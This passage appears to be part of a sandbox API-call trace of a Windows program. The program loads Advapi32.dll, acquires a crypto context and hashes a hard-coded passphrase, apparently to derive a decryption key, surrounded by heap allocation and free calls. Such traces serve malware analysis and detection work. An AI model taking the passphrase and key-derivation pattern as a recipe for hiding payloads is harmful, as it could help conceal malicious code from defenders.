lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0079.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.722] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.722] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.722] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.722] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.722] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.723] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0079.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.723] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0079.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0079.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0079.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0079.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fe8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0079.724] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a49d0) returned 1 [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.724] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0079.724] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0079.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cac28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0079.725] CryptCreateHash (in: hProv=0x41a49d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0079.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.725] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e28a8 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0079.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2788 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2b18 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0079.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x23) returned 0x17e2848 [0079.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x22) returned 0x17e2b18 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.726] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.726] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.728] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.728] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0079.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43cafe8 [0079.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafe8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.729] CryptHashData (hHash=0x41ac700, pbData=0x17e28a8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.729] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0079.730] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.730] RtlAllocateHeap 